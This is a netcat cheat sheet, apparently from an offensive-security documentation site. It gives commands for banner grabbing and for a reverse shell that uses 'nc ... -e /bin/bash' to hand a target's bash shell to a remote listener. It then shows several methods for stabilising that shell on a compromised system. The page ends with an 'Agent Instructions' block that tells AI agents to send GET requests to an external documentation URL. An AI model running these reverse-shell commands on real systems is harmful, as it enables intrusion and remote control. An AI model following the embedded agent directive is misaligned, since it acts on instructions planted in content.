# Netcat - Advanced ## Usage and Examples ### Using netcat for banner grabbing ```bash nc 192.168.1.1 80 ``` ### Reverse shell with netcat On listener's machine: ```bash nc -lvnp 1234 ``` (The option specifies listening verbosely on the given port with no name resolution) On target machine: ```bash nc [target_ip] 1234 -e /bin/bash ``` (Specifying `-e /bin/bash` is optional.) ## Stabilizing Netcat By default, Netcat shells are often unstable and lack features like command history, tab completion, and proper terminal handling. Stabilizing the shell involves transforming it into a more robust and interactive session in order to improve its reliability, and enhance the control over the compromised system. ## Methods for Netcat Shell Stabilization ### Using `rlwrap` Steps: #### 1. Install `rlwrap` in your local machine if not installed ```bash sudo apt-get install rlwrap ``` #### 2. Use the netcat command with `rlwrap` ```bash rlwrap nc -lvnp 4444 ``` 3. Background the shell with `Ctrl + Z` . 4. Re-enter the shell ```bash stty raw -echo; fg ``` ### Upgrading to fully interactive TTY Use python: 1. ```bash python3 -c 'import pty; pty.spawn("/bin/bash")' ``` 2. ```bash export TERM=xterm ``` 3. ```bash stty raw -echo; fg ``` ### Setting terminal variables Steps: #### Background the netcat shell Use the command `CTRL + Z`. #### Set terminal typs ```bash stty raw -echo; fg ``` #### Export terminal variables ```bash reset ``` ```bash export SHELL=bash ``` ```bash export TERM=xterm ``` ```bash stty rows [number] columns [number] ``` (Replace `[number]` with the appropriate values for your terminal size) ## Overview of Netcat Shell stabilization Step 1: Use Python to spawn a better-featured bash shell, which will make our shell look a bit prettier. ```bash python3 -c 'import pty;pty.spawn("/bin/bash")' ``` We still won’t be able to use tab autocomplete or the arrow keys. Step 2: Get access to term commands such as clear. ```bash export TERM=xterm ``` Step 3: Now, background the shell. ``` Ctrl + Z ``` Step 4: Use the following back in the normal terminal: ```bash stty raw -echo; fg ``` This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes. Step 5: Finally correct the distorted rows and columns of the terminal shell where we write command. ```bash stty rows 38 columns 116 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hacktools.aprasanna.com.np/netcat/netcat-advanced.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.